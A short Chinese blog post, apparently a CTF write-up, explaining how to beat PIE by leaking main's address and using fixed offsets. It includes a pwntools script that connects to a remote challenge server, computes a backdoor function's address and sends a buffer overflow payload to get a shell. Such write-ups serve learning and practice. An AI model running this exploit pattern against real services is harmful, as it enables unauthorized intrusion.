PIE

开了pie就是地址基址没了，所以遇到pie的题目，就要想尽一切办法，把一个函数的真正地址给它搞出来，然后利用相对地址不变的原理去进行攻击

这个题目就是开局送main的地址，然后就可以了

点击查看代码

from pwn import*

io=remote("1.14.71.254",28325)
io.recvuntil("OHHH!,give you a gift!\n")
main_addr=int(io.recvuntil("\n")[:-1],16)
io.recvuntil("Input:\n")
shell_addr=main_addr-0x770+0x80F
payload='a'*(0x28+4)+p32(shell_addr)
io.sendline(payload)
io.interactive()

posted @ 2022-09-11 16:11 REPWNER 阅读(11) 评论(0) 收藏举报

刷新页面返回顶部

REPWNER

PIE

公告